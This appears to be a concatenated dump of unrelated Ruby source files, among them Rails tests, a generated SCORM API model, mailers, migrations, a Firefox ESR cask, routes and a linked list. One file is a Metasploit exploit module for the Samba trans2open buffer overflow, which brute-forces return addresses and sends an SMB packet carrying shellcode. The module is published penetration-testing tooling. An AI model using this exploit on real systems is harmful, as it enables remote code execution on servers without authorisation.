f8b4c03d4de979f5aa1157475a9a17106c089e2f | 595 | require 'test_helper'
class SessionsControllerTest < ActionController::TestCase
test "should get new" do
get :new
assert_response :success
end
test "should login" do
jarvis = users(:one)
post :create, name: jarvis.name, password: 'secret'
assert_redirected_to admin_url
assert_equal jarvis.id, session[:user_id]
end
test "should fail login" do
jarvis = users(:one)
post :create, name: jarvis.name, password: 'wrong'
assert_redirected_to login_url
end
test "should logout" do
delete :destroy
assert_redirected_to store_url
end
end
| 21.25 | 57 | 0.710924 |
bff6fe93268fef00554534ffd9d2ce1a2e521357 | 9,124 | =begin
#SCORM Cloud Rest API
#REST API used for SCORM Cloud integrations.
OpenAPI spec version: 2.0 beta
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.3
=end
require 'date'
module RusticiSoftwareCloudV2
class CreateRegistrationSchema
attr_accessor :course_id
attr_accessor :learner
attr_accessor :registration_id
# The xapiRegistrationId to be associated with this registration. If not specified, the system will assign an xapiRegistrationId. As per the xApi specification, this must be a UUID.
attr_accessor :xapi_registration_id
attr_accessor :learner_tags
attr_accessor :course_tags
attr_accessor :registration_tags
# Specifies an optional override URL for which to post activity and status data in real time as the course is completed. By default all of these settings are read from your configuration.
attr_accessor :post_back
attr_accessor :initial_registration_state
attr_accessor :initial_settings
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'course_id' => :'courseId',
:'learner' => :'learner',
:'registration_id' => :'registrationId',
:'xapi_registration_id' => :'xapiRegistrationId',
:'learner_tags' => :'learnerTags',
:'course_tags' => :'courseTags',
:'registration_tags' => :'registrationTags',
:'post_back' => :'postBack',
:'initial_registration_state' => :'initialRegistrationState',
:'initial_settings' => :'initialSettings'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'course_id' => :'String',
:'learner' => :'LearnerSchema',
:'registration_id' => :'String',
:'xapi_registration_id' => :'String',
:'learner_tags' => :'Array<String>',
:'course_tags' => :'Array<String>',
:'registration_tags' => :'Array<String>',
:'post_back' => :'PostBackSchema',
:'initial_registration_state' => :'RegistrationSchema',
:'initial_settings' => :'SettingsPostSchema'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'courseId')
self.course_id = attributes[:'courseId']
end
if attributes.has_key?(:'learner')
self.learner = attributes[:'learner']
end
if attributes.has_key?(:'registrationId')
self.registration_id = attributes[:'registrationId']
end
if attributes.has_key?(:'xapiRegistrationId')
self.xapi_registration_id = attributes[:'xapiRegistrationId']
end
if attributes.has_key?(:'learnerTags')
if (value = attributes[:'learnerTags']).is_a?(Array)
self.learner_tags = value
end
end
if attributes.has_key?(:'courseTags')
if (value = attributes[:'courseTags']).is_a?(Array)
self.course_tags = value
end
end
if attributes.has_key?(:'registrationTags')
if (value = attributes[:'registrationTags']).is_a?(Array)
self.registration_tags = value
end
end
if attributes.has_key?(:'postBack')
self.post_back = attributes[:'postBack']
end
if attributes.has_key?(:'initialRegistrationState')
self.initial_registration_state = attributes[:'initialRegistrationState']
end
if attributes.has_key?(:'initialSettings')
self.initial_settings = attributes[:'initialSettings']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @course_id.nil?
invalid_properties.push('invalid value for "course_id", course_id cannot be nil.')
end
if @learner.nil?
invalid_properties.push('invalid value for "learner", learner cannot be nil.')
end
if @registration_id.nil?
invalid_properties.push('invalid value for "registration_id", registration_id cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @course_id.nil?
return false if @learner.nil?
return false if @registration_id.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
course_id == o.course_id &&
learner == o.learner &&
registration_id == o.registration_id &&
xapi_registration_id == o.xapi_registration_id &&
learner_tags == o.learner_tags &&
course_tags == o.course_tags &&
registration_tags == o.registration_tags &&
post_back == o.post_back &&
initial_registration_state == o.initial_registration_state &&
initial_settings == o.initial_settings
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[course_id, learner, registration_id, xapi_registration_id, learner_tags, course_tags, registration_tags, post_back, initial_registration_state, initial_settings].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = RusticiSoftwareCloudV2.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 31.680556 | 191 | 0.636234 |
e98fa9d9ea240c5a578c28aea8260be1493c5a0c | 4,885 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba trans2open Overflow (Linux x86)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the flaw on x86 Linux systems that do not
have the noexec stack option set.
NOTE: Some older versions of RedHat do not seem to be vulnerable
since they apparently do not allow anonymous access to IPC.
},
'Author' => [ 'hdm', 'jduck' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2003-0201' ],
[ 'OSVDB', '4469' ],
[ 'BID', '7294' ],
[ 'URL', 'http://seclists.org/bugtraq/2003/Apr/103' ]
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
'StackAdjustment' => -3500
},
'Platform' => 'linux',
'Targets' =>
[
# tested OK - jjd:
# RedHat 7.2 samba-2.2.1a-4 - 0xbffffafc
# RedHat 9.0 samba-2.2.7a-7.9.0 - 0xbfffddfc
[ 'Samba 2.2.x - Bruteforce',
{
'PtrToNonZero' => 0xbffffff4, # near the bottom of the stack
'Offset' => 1055,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0xbffffdfc },
'Stop' => { 'Ret' => 0xbfa00000 },
'Step' => 256
}
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 7 2003'
))
register_options(
[
Opt::RPORT(139)
])
end
def brute_exploit(addrs)
curr_ret = addrs['Ret']
begin
print_status("Trying return address 0x%.8x..." % curr_ret)
connect
smb_login
if ! @checked_peerlm
if smb_peer_lm !~ /samba/i
fail_with(Failure::NoTarget, "This target is not a Samba server (#{smb_peer_lm}")
end
if smb_peer_lm =~ /Samba [34]\./i
fail_with(Failure::NoTarget, "This target is not a vulnerable Samba server (#{smb_peer_lm})")
end
end
@checked_peerlm = true
# This value *must* be 1988 to allow findrecv shellcode to work
# XXX: I'm not sure the above comment is true...
pattern = rand_text_english(1988)
# See the OSX and Solaris versions of this module for additional
# information.
# eip_off = 1071 - RH7.2 compiled with -ggdb instead of -O/-O2
# (rpmbuild -bp ; edited/reran config.status ; make)
eip_off = target['Offset']
ptr_to_non_zero = target['PtrToNonZero']
# Stuff the shellcode into the request
pattern[0, payload.encoded.length] = payload.encoded
# We want test true here, so we overwrite conn with a pointer
# to something non-zero.
#
# 222 if (IS_IPC(conn)) {
# 223 return(ERROR(ERRSRV,ERRaccess));
# 224 }
pattern[eip_off + 4, 4] = [ptr_to_non_zero - 0x30].pack('V')
# We want to avoid crashing on the following two derefences.
#
# 116 int error_packet(char *inbuf,char *outbuf,int error_class,uint32 error_code,int line)
# 117 {
# 118 int outsize = set_message(outbuf,0,0,True);
# 119 int cmd = CVAL(inbuf,smb_com);
pattern[eip_off + 8, 4] = [ptr_to_non_zero - 0x08].pack('V')
pattern[eip_off + 12, 4] = [ptr_to_non_zero - 0x24].pack('V')
# This stream covers the framepointer and the return address
#pattern[1199, 400] = [curr_ret].pack('N') * 100
pattern[eip_off, 4] = [curr_ret].pack('V')
trans =
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
"\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
pattern
# puts "press any key"; $stdin.gets
sock.put(trans)
handler
rescue ::EOFError
rescue ::Rex::Proto::SMB::Exceptions::LoginError, ::Interrupt, ::RuntimeError
raise $!
rescue ::Exception => e
print_error("#{rhost} #{e}")
end
handler
disconnect
end
end
| 31.720779 | 103 | 0.555169 |
03eb7568b991079489e7e10181f4c51c673dd0f7 | 367 | module Pageflow
class UserMailer < ActionMailer::Base
def invitation(options)
@user = options[:user]
@password_token = options[:password_token]
I18n.with_locale(@user.locale) do
headers('X-Language' => I18n.locale)
mail(to: @user.email, subject: t('.subject'), from: Pageflow.config.mailer_sender)
end
end
end
end
| 26.214286 | 90 | 0.656676 |
08db2575bef2599c9317abff9af528afb1c46e4d | 364 | class CreateBudgets < ActiveRecord::Migration
def change
create_table :budgets do |t|
t.references :user, index: true, null: false
t.references :category, index: true, null: false
t.references :currency, index: true, null: false
t.decimal :limit, null: false, precision: 10, scale: 2
t.timestamps null: false
end
end
end
| 28 | 60 | 0.673077 |
79eedd6182fcd6b63b5cba29642088efdf767447 | 2,451 | cask 'firefox-esr' do
version '60.1.0'
language 'cs' do
sha256 '8fd11e84e2a13b905709b48551348ddaaa65d39c0f1e0fbc925ef9600225bf78'
'cs'
end
language 'de' do
sha256 '769db2010a2a92b3f9d2e64925768e7dd400ecdf7d99c4d788ab7ac016ea1a54'
'de'
end
language 'en-GB' do
sha256 '893dda71ed99782a30bee944ba57720ff7a4edff63d4ceab1fdc352cbfbd6671'
'en-GB'
end
language 'en', default: true do
sha256 '26e4e7443b22bdce63d7d135ea7df569d38386d0869154a026e96f19d1f8b63a'
'en-US'
end
language 'fr' do
sha256 '16070e8f3b36a04376ff2c1ef0382b6519b24d5f83843a44d8a263f10642892f'
'fr'
end
language 'gl' do
sha256 '2e04720319d67f594c06c8c97d5dde51a5d3b0ff285d067514faa3cc99a65f26'
'gl'
end
language 'it' do
sha256 '9cc07e009364ae90cdda51a184ae7abc111f9d510ff73c2367ab6fc7a0c41c47'
'it'
end
language 'ja' do
sha256 '4fe1d14529b04e7c406981129ebcd9b0b3bb7e159ede8c361b62d089e59fcf80'
'ja-JP-mac'
end
language 'nl' do
sha256 '0ea15badef338c912fadb720802dd7bdcad576094dbbd05c4a4e1c8f9dd02dca'
'nl'
end
language 'pl' do
sha256 'f00a492166de13254f475dcdf4b5c7310a0afa1f7a744ca387ca90c53a5e350e'
'pl'
end
language 'pt' do
sha256 'a2b40213b65c6f8d295407bb28fe9fdaf65564fc83ec47ed0a48e00eb8102112'
'pt-PT'
end
language 'ru' do
sha256 '9dec76aaaa4cbd0599cbb28f6a529c8e182a78fcc2f7fc251c26e25d4c25eaf3'
'ru'
end
language 'uk' do
sha256 'c5fa57d5ebf5e5fcfff451ed62474e210c86eb70449ffb04a01c2183ff952e8b'
'uk'
end
language 'zh-TW' do
sha256 'c0b3daef788308e2bc683f3f5df522018c26226aa2ffc356ecd3796ea40f7232'
'zh-TW'
end
language 'zh' do
sha256 '463e5227268ede163e4dde98de7e9105710c3ac93e03ac88fc93680d1091b99f'
'zh-CN'
end
# download-installer.cdn.mozilla.net/pub/firefox/releases was verified as official when first introduced to the cask
url "https://download-installer.cdn.mozilla.net/pub/firefox/releases/#{version}esr/mac/#{language}/Firefox%20#{version}esr.dmg"
name 'Mozilla Firefox ESR'
name 'Mozilla Firefox Extended Support Release'
homepage 'https://www.mozilla.org/firefox/organizations/'
conflicts_with cask: [
'firefox',
'firefox-beta',
]
app 'Firefox.app'
zap trash: [
'~/Library/Application Support/Firefox',
'~/Library/Caches/Firefox',
]
end
| 25.268041 | 129 | 0.72501 |
bfaecdb65818d11b62ae8b60b4516d1ebebf0acd | 3,423 | # frozen_string_literal: true
class BaseMailer < ActionMailer::Base
self.mailer_name = "base_mailer"
default to: "[email protected]",
from: "[email protected]",
reply_to: "[email protected]"
def welcome(hash = {})
headers["X-SPAM"] = "Not SPAM"
mail({ subject: "The first email on new API!" }.merge!(hash))
end
def welcome_with_headers(hash = {})
headers hash
mail
end
def welcome_from_another_path(path)
mail(template_name: "welcome", template_path: path)
end
def html_only(hash = {})
mail(hash)
end
def plain_text_only(hash = {})
mail(hash)
end
def inline_attachment
attachments.inline["logo.png"] = "\312\213\254\232"
mail
end
def attachment_with_content(hash = {})
attachments["invoice.pdf"] = "This is test File content"
mail(hash)
end
def attachment_with_hash
attachments["invoice.jpg"] = { data: ::Base64.encode64("\312\213\254\232)b"),
mime_type: "image/x-jpg",
transfer_encoding: "base64" }
mail
end
def attachment_with_hash_default_encoding
attachments["invoice.jpg"] = { data: "\312\213\254\232)b",
mime_type: "image/x-jpg" }
mail
end
def implicit_multipart(hash = {})
attachments["invoice.pdf"] = "This is test File content" if hash.delete(:attachments)
mail(hash)
end
def implicit_with_locale(hash = {})
mail(hash)
end
def explicit_multipart(hash = {})
attachments["invoice.pdf"] = "This is test File content" if hash.delete(:attachments)
mail(hash) do |format|
format.text { render plain: "TEXT Explicit Multipart" }
format.html { render plain: "HTML Explicit Multipart" }
end
end
def explicit_multipart_templates(hash = {})
mail(hash) do |format|
format.html
format.text
end
end
def explicit_multipart_with_any(hash = {})
mail(hash) do |format|
format.any(:text, :html) { render plain: "Format with any!" }
end
end
def explicit_without_specifying_format_with_any(hash = {})
mail(hash) do |format|
format.any
end
end
def explicit_multipart_with_options(include_html = false)
mail do |format|
format.text(content_transfer_encoding: "base64") { render "welcome" }
format.html { render "welcome" } if include_html
end
end
def explicit_multipart_with_one_template(hash = {})
mail(hash) do |format|
format.html
format.text
end
end
def implicit_different_template(template_name = "")
mail(template_name: template_name)
end
def explicit_different_template(template_name = "")
mail do |format|
format.text { render template: "#{mailer_name}/#{template_name}" }
format.html { render template: "#{mailer_name}/#{template_name}" }
end
end
def different_layout(layout_name = "")
mail do |format|
format.text { render layout: layout_name }
format.html { render layout: layout_name }
end
end
def email_with_translations
mail body: render("email_with_translations", formats: [:html])
end
def without_mail_call
end
def with_nil_as_return_value
mail(template_name: "welcome")
nil
end
def with_subject_interpolations
mail(subject: default_i18n_subject(rapper_or_impersonator: "Slim Shady"), body: "")
end
end
| 24.625899 | 89 | 0.654105 |
284640ee547b89db665ca98b1d840455c3f06157 | 962 | require "conjoin/version"
require "dominate/inflectors"
# require "conjoin/recursive_ostruct"
require "conjoin/middleware"
require "conjoin/env_string"
require "conjoin/class_methods"
require "conjoin/cuba"
require "conjoin/seeds"
module Conjoin
extend ClassMethods
autoload :ActiveRecord, "conjoin/active_record"
autoload :Assets , "conjoin/assets"
autoload :Auth , "conjoin/auth"
autoload :Environment , "conjoin/environment"
autoload :FormBuilder , "conjoin/form_builder"
autoload :I18N , "conjoin/i18n"
autoload :Widgets , "conjoin/widgets"
autoload :Csrf , "conjoin/csrf"
autoload :As , "conjoin/as"
autoload :Ui , "conjoin/ui"
autoload :JQuery , "conjoin/jquery"
autoload :Nav , "conjoin/nav"
autoload :AuthToken , "conjoin/auth_token"
# ActionMailer
# https://gist.github.com/acwright/1944639
# DelayedJob
# https://gist.github.com/robhurring/732327
end
| 31.032258 | 49 | 0.698545 |
f858d52e7519597876d3f50eb129a9685d235889 | 1,296 | module Swagger
module V1
module Resources
module Apress
module AmazonAssets
class AssetsController < ::Apress::Documentation::Swagger::Schema
swagger_path('/asssets/{id}') do
operation :get do
key :produces, ['application/json']
key :description,
"-" \
"<h4>Allowed user roles:</h4> User."
key :operationId, 'asssetShow'
key :tags, ['amazon_assets']
parameter do
key :name, :id
key :in, :path
key :description, "ИД ассета"
key :type, :integer
key :format, :int64
end
response 200 do
key :description, 'Success response'
schema type: 'object' do
property :asset do
key :'$ref', :'Swagger::V1::Models::Apress::AmazonAssets::Asset'
end
end
end
extend Swagger::V1::DefaultResponses::Unauthenticated
extend Swagger::V1::DefaultResponses::NotFound
end
end
end
end
end
end
end
end
| 29.454545 | 86 | 0.449846 |
d57c9e56f5673b9d42609df9cf2334d5de35f7c2 | 1,086 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'materialistic/version'
Gem::Specification.new do |spec|
spec.name = "materialistic"
spec.version = Materialistic::VERSION
spec.authors = ["Yasuaki Uechi"]
spec.email = ["[email protected]"]
spec.summary = %q{Clarify materials by MPN, SKU and vague material name.}
spec.description = %q{Clarify materials by MPN, SKU and vague material name.}
spec.homepage = "https://github.com/uetchy/materialistic"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.7"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "rspec"
spec.add_development_dependency "webmock"
spec.add_development_dependency "vcr"
spec.add_development_dependency "pry-byebug"
spec.add_dependency "mechanize"
end
| 37.448276 | 81 | 0.694291 |
e8c346b3d97dbc066f432bcd20b2461d3aaee2e7 | 401 | require 'spec_helper'
module GPhoto2
describe Port do
before do
allow_any_instance_of(Port).to receive(:new)
end
describe '#info=' do
let(:port) { Port.new }
before do
allow(port).to receive(:set_info)
end
it 'returns the input value' do
info = double(:port_info)
expect(port.info = info).to eq(info)
end
end
end
end
| 17.434783 | 50 | 0.59601 |
61d93b809e504568fe3712dcef3853ce1133179e | 1,608 | #!/usr/bin/env ruby
gem 'minitest', '>= 5.0.0'
require 'minitest/autorun'
require_relative 'binary'
class BinaryTest < Minitest::Test
def test_binary_0_is_decimal_0
assert_equal 0, Binary.new('0').to_decimal
end
def test_binary_1_is_decimal_1
assert_equal 1, Binary.new('1').to_decimal
end
def test_binary_10_is_decimal_2
assert_equal 2, Binary.new('10').to_decimal
end
def test_binary_11_is_decimal_3
assert_equal 3, Binary.new('11').to_decimal
end
def test_binary_100_is_decimal_4
assert_equal 4, Binary.new('100').to_decimal
end
def test_binary_1001_is_decimal_9
assert_equal 9, Binary.new('1001').to_decimal
end
def test_binary_11010_is_decimal_26
assert_equal 26, Binary.new('11010').to_decimal
end
def test_binary_10001101000_is_decimal_1128
assert_equal 1128, Binary.new('10001101000').to_decimal
end
def test_binary_ignores_leading_zeros
assert_equal 31, Binary.new('000011111').to_decimal
end
def test_invalid_binary_numbers_raise_an_error
%w(012 10nope nope10).each do |input|
assert_raises ArgumentError do
Binary.new(input)
end
end
end
# Problems in exercism evolve over time,
# as we find better ways to ask questions.
# The version number refers to the version of the problem you solved,
# not your solution.
#
# Define a constant named VERSION inside of Binary.
# If you're curious, read more about constants on RubyDoc:
# http://ruby-doc.org/docs/ruby-doc-bundle/UsersGuide/rg/constants.html
def test_bookkeeping
assert_equal 1, Binary::VERSION
end
end
| 25.52381 | 73 | 0.745647 |
386bd023ea25e5baeefc793533d1865b03566c6e | 1,318 | lib = File.expand_path('lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'chloride/version'
Gem::Specification.new do |spec|
spec.name = 'chloride'
spec.version = Chloride::VERSION
spec.authors = ['Brandon High', 'Eric Williamson', 'Nick Lewis']
spec.email = ['[email protected]', '[email protected]', '[email protected]']
spec.summary = 'A simple streaming NetSSH implementation'
# spec.description = %q{TODO: More verbose description here.}
spec.homepage = 'https://github.com/puppetlabs/chloride'
spec.license = 'Apache-2.0'
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(\..*|(test|spec|features)/)})
end
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.required_ruby_version = '~> 2.4'
spec.add_development_dependency 'bundler'
spec.add_development_dependency 'gem-release'
spec.add_development_dependency 'pry'
spec.add_development_dependency 'rake', '~> 11'
spec.add_development_dependency 'rspec', '~> 3'
spec.add_development_dependency 'rubocop'
spec.add_development_dependency 'simplecov'
spec.add_dependency 'net-scp'
spec.add_dependency 'net-ssh'
end
| 37.657143 | 99 | 0.685888 |
d5d808eab72a4bd81821ed359ab48bbd2bb606cc | 1,479 | require_relative 'node'
class LinkedList
attr_reader :head
def initialize
@head = nil
end
# Time complexity - O(1)
# Space complexity - O(1)
def add_first(data)
if @head
new_node = Node.new(data, @head)
@head = new_node
else
@head = Node.new(data)
end
end
# Time complexity - O(1)
# Space complexity - O(1)
def get_first
if @head.nil?
return nil
else
return @head.data
end
end
# Time complexity - O(n)
# Space complexity - O(1)
def length
current = @head
len = 0
until current.nil?
len += 1
current = current.next
end
return len
end
# Time complexity - O(n)
# Space complexity - O(1)
def add_last(data)
if @head
current = @head
until current.next.nil?
current = current.next
end
new_node = Node.new(data)
current.next = new_node
else
@head = Node.new(data)
end
end
# Time complexity - O(n)
# Space complexity - O(1)
def get_last
if @head.nil?
return nil
else
current = @head
until current.next.nil?
current = current.next
end
return current.data
end
end
# Time complexity - O(n)
# Space complexity - O(1)
def get_at_index(index)
if @head.nil? || index >= length
return nil
else
current = @head
index.times do
current = current.next
end
return current.data
end
end
end
| 16.617978 | 38 | 0.57336 |
625bd52d58a2e2838cf0705074840660f7693bf2 | 140 | module Wrxer
class CommentCollection
include Collection
xpath "item"
collection :comments, "//wp:comment", Comment
end
end
| 15.555556 | 49 | 0.707143 |
18a031b23b26c70a1cc170aa13ddb5a4f6c3b88e | 325 | class CreateProducts < ActiveRecord::Migration[5.2]
def change
create_table :products do |t|
t.string :title
t.text :description
t.decimal :price
t.decimal :size
t.boolean :is_spicy
t.boolean :is_veg
t.boolean :is_best_offer
t.string :path_to_image
t.timestamps
end
end
end
| 19.117647 | 51 | 0.670769 |
010bc39db455cd1c5c6c7ea4a7141c2f613d1675 | 4,219 | ActionController::Routing::Routes.draw do |map|
# Add your own custom routes here.
# The priority is based upon order of creation: first created -> highest priority.
# Here's a sample route:
# map.connect 'products/:id', :controller => 'catalog', :action => 'view'
# Keep in mind you can assign values other than :controller and :action
# You can have the root of your site routed by hooking up ''
# -- just remember to delete public/index.html.
map.connect '', :controller => 'main', :action => 'index'
map.connect 'admin', :controller => 'admin/dashboard', :action => 'index'
map.connect 'admin/projects/:action/:id', :controller => 'admin/projects'
map.connect 'admin/milestones/:action', :controller => "admin/milestones"
map.connect 'admin/categories/:action/:id', :controller => 'admin/categories'
map.connect 'admin/tags/:action/:id', :controller => 'admin/tags'
map.connect 'rss/tickets', :controller => 'rss', :action => 'tickets'
map.connect ':project/repository/browse/*path',
:controller => 'repository',
:action => 'browse'
map.connect 'repository/browse/*path',
:controller => 'repository',
:action => 'browse'
# "Routing Error: Path components must occur last" :(
#map.connect 'repository/browse/*path/rev/:rev',
# :controller => 'repository',
# :action => 'browse',
# :rev => /\d+/
# TODO: Rework this into a general browse/view_file usable thing
#map.connect 'repository/file/rev/:rev/*path',
# :controller => 'repository',
# :action => 'view_file',
# :rev => /\d+/
map.connect ':project/repository/file/*path',
:controller => 'repository',
:action => 'view_file'
map.connect 'repository/file/*path',
:controller => 'repository',
:action => 'view_file'
map.connect ':project/repository/revisions/*path',
:controller => 'repository',
:action => 'revisions'
map.connect 'repository/revisions/*path',
:controller => 'repository',
:action => 'revisions'
map.connect ':project/repository/changesets',
:controller => 'repository',
:action => 'changesets'
map.connect ':project/repository/changesets/:revision',
:controller => 'repository',
:action => 'show_changeset'
map.connect 'repository/changesets/:revision',
:controller => 'repository',
:action => 'show_changeset'
map.connect ':project/tickets',
:controller => 'tickets',
:action => 'index'
map.connect ':project/releases/:action/:id',
:controller => 'releases'
map.connect 'tickets',
:controller => 'tickets'
map.connect ':project/tickets/new',
:controller => 'tickets',
:action => 'new'
map.connect ':project/components/:action/:id',
:controller => "components"
map.connect ':project/tickets/:id',
:controller => 'tickets',
:action => 'show',
:requirements => { :id => /\d+/ }
map.connect 'tickets/:id',
:controller => 'tickets',
:action => 'show',
:requirements => { :id => /\d+/ }
map.connect ':project/milestones',
:controller => 'milestones',
:action => 'index'
map.connect ':project/milestones/:id',
:controller => 'milestones',
:action => 'show'
map.connect ':project/search',
:controller => 'search'
map.connect ':project',
:controller => 'main'
#map.projects 'projects',
# :controller => "projects",
# :action => 'index'
map.connect ':controller/:action/:id'
# Allow downloading Web Service WSDL as a file with an extension
# instead of a file named 'wsdl'
#map.connect ':controller/service.wsdl', :action => 'wsdl'
end
| 34.024194 | 84 | 0.546812 |
4a913adaf292282cee52409fa0cdf9cc6c75d22a | 288 | # frozen_string_literal: true
class CreateUserEvents < ActiveRecord::Migration[6.0]
def change
create_table :user_events do |t|
t.references :user, null: false, foreign_key: true
t.references :event, null: false, foreign_key: true
t.timestamps
end
end
end
| 22.153846 | 57 | 0.704861 |
6113b2c43943427a315d592f513801295cc82892 | 363 | require 'rubygems'
require 'midiator'
midi = MIDIator::Interface.new
midi.autodetect_driver
include MIDIator::Notes
C4MAJ = [ C4, E4, G4 ]
F4MAJII = [ C4, F4, A4 ]
G4MAJ = [ D4, G4, B4 ]
song = [ C3, C4MAJ, C3, C4MAJ, F3, F4MAJII, F3, F4MAJII, G3, G4MAJ, G3, G4MAJ, C5, C4MAJ, C2, C4MAJ]
4.times do
song.each do |note|
midi.play note, 0.25
end
end
| 17.285714 | 100 | 0.652893 |
ff46ec7b8ee8de563fa798e4873fc21c959befd1 | 1,882 | require "sidekiq/web"
Rails.application.routes.draw do
root to: "projects#index"
# Sidekiq
authenticate :user, lambda { |u| u.admin? } do
mount Sidekiq::Web => "/sidekiq"
end
# ActionCable
mount ActionCable.server => "/cable"
# Auth
devise_for :users, controllers: { invitations: "users/invitations" }, skip: [:registrations, :sessions]
as :user do
get "users/edit" => "users/registrations#edit", :as => "edit_user_registration"
get "users/edit_avatar" => "users/registrations#edit_avatar", :as => "edit_user_avatar"
post "users/update_avatar" => "users/registrations#update_avatar", :as => "update_user_avatar"
post "users" => "users/registrations#update", :as => "user_registration"
get "signin", to: "devise/sessions#new", as: :new_user_session
post "signin", to: "devise/sessions#create", as: :user_session
delete "signout", to: "devise/sessions#destroy", as: :destroy_user_session
end
# Resources
resources :projects, except: [:destroy], shallow: true do
member do
post "archive"
post "unarchive"
end
resources :membership, only: [:destroy] do
member do
post "promote"
post "demote"
post "reinvite"
end
end
resources :sessions do
member do
post "upload/:asset_type", to: "sessions#upload", as: :upload_asset_to
get "tab/:tab", to: "sessions#show", as: :tab, constraints: { tab: /(photos|consent_forms|data_points)/ }
end
resources :data_points, except: [:index] do
member do
post "bookmark"
post "unbookmark"
end
end
resources :consent_forms, except: [:new]
resources :photos, only: [:show, :destroy] do
get "download", on: :member
end
end
end
resources :projects, only: [] do
resources :members, only: [:index, :show]
end
end
| 28.953846 | 113 | 0.63762 |
bf6b43efb90871587b9b2681069c3caca121df45 | 7,193 | # frozen_string_literal: true
require "dependabot/file_fetchers"
require "dependabot/file_fetchers/base"
require "dependabot/bundler/file_updater/lockfile_updater"
require "dependabot/errors"
module Dependabot
module Bundler
class FileFetcher < Dependabot::FileFetchers::Base
require "dependabot/bundler/file_fetcher/gemspec_finder"
